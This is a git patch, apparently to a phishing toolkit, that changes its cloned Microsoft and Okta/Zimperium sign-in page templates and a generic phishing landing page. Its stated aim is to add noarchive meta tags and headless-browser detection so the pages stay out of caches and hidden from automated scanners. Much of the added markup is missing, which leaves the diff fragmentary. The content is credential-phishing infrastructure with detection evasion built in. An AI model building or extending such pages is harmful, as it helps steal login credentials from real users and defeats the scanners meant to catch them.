From cfb6c242d83deccce4b1e60233f07d7ee82d5738 Mon Sep 17 00:00:00 2001 From: n0mad1k Date: Thu, 25 Jun 2026 10:20:27 -0400 Subject: [PATCH] Add robots noarchive meta and headless browser detection to all page templates --- .../page-templates/microsoft-login.html.j2 | 12 ++++++++++++ .../templates/page-templates/okta-login.html.j2 | 16 ++++++++++++++-- .../page-templates/phishing-landing-page.j2 | 12 ++++++++++++ 3 files changed, 38 insertions(+), 2 deletions(-) diff --git a/modules/phishing/webserver/templates/page-templates/microsoft-login.html.j2 b/modules/phishing/webserver/templates/page-templates/microsoft-login.html.j2 index 53e7cd7..157626e 100644 --- a/modules/phishing/webserver/templates/page-templates/microsoft-login.html.j2 +++ b/modules/phishing/webserver/templates/page-templates/microsoft-login.html.j2 @@ -3,6 +3,7 @@ Sign in to your account + Zimperium - Sign In - + @@ -554,5 +554,17 @@ applyStyle('login-bg-image', 'bgStyle'); applyStyle('login-bg-image-ie8', 'bgStyleIE8'); }); - + + + diff --git a/modules/phishing/webserver/templates/page-templates/phishing-landing-page.j2 b/modules/phishing/webserver/templates/page-templates/phishing-landing-page.j2 index 2cd06ff..da01921 100644 --- a/modules/phishing/webserver/templates/page-templates/phishing-landing-page.j2 +++ b/modules/phishing/webserver/templates/page-templates/phishing-landing-page.j2 @@ -3,6 +3,7 @@ + {{ page_title | default('Sign in to your account') }}